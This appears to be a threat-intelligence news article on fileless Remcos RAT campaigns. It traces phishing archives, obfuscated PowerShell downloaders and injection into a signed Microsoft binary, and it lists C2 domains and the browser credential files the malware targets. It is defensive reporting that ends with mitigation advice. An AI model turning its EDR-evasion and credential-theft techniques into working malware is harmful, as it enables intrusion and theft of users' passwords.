In the third quarter of 2025, Remcos, a commercial remote access tool (RAT) originally designed for legitimate surveillance purposes, has emerged as the predominant infostealer in malware campaigns, accounting for approximately 11% of detected cases. Cybercriminals have adapted Remcos into sophisticated fileless attack chains that effectively bypass endpoint detection and response (EDR) systems.
Attack Methodology
The primary objective of these attacks is credential theft, with a particular emphasis on the financial sector. Recent evidence indicates that attackers have compromised legitimate websites to host additional malicious payloads, thereby expanding the reach and impact of their operations.
The attack sequence typically begins with deceptive emails containing seemingly innocuous business attachments. For instance, a file named EFEMMAK TURKEY INQUIRY ORDER NR 09162025.gz serves as the initial vector. Upon extraction, this archive deploys a batch file into the Windows temporary directory. This batch file then executes a heavily obfuscated PowerShell script, utilizing custom string de-obfuscation functions named Lotusblo and Garrots.
Analysts at CyberProof have identified that the PowerShell script initiates hidden processes while configuring web requests to use TLS 1.2 and custom User-Agent strings, making the network traffic appear legitimate. The script constructs a target file path at C:\Users\\AppData\Roaming\Hereni.Gen and enters a continuous download loop, attempting to retrieve files from a malicious command-and-control (C2) domain every four seconds.
Upon successful download, the script Base64 decodes and GZip decompresses the retrieved payload before executing it through Invoke-Expression. This method enables dynamic command execution while leaving no traces on disk, effectively evading traditional file-based detection mechanisms.
Process Injection and Detection Evasion
A key technique employed by attackers involves leveraging msiexec.exe, a legitimate Windows installer executable, to perform process injection into RmClient.exe, a Microsoft-distributed file. This fileless approach is particularly effective against traditional EDR solutions because RmClient.exe carries legitimate digital signatures, causing many detection systems to overlook the injected Remcos payload.
Once injected, the malware immediately begins accessing browser credential stores, targeting files such as key4.db, logins.json, and Login Data, which contain saved passwords and sensitive authentication information. Network communications from the compromised RmClient.exe process are directed to command-and-control servers at ablelifepurelife.ydns.eu and icebergtbilisi.ge on non-standard ports like 57864 and 50807, revealing the attacker’s infrastructure.
The malware demonstrates persistence by spawning multiple RmClient.exe instances with random parameters stored in the temporary directory. This tactic complicates detection efforts and enables the threat actor to maintain long-term access for subsequent, potentially more destructive operations.
Implications and Defensive Measures
The emergence of these fileless Remcos attacks underscores the evolving sophistication of cyber threats and the challenges they pose to traditional security measures. Organizations must enhance their detection capabilities to identify process injection patterns and monitor unusual credential access activities, particularly those involving legitimate system binaries.
Implementing comprehensive PowerShell logging, enabling Antimalware Scan Interface (AMSI) monitoring, and deploying robust EDR solutions capable of detecting behavioral anomalies are critical steps in mitigating such threats. Additionally, educating employees about the risks associated with opening unsolicited email attachments and maintaining up-to-date security patches can further reduce the risk of compromise.
As cybercriminals continue to refine their tactics, a proactive and layered security approach is essential to protect sensitive information and maintain the integrity of organizational systems.
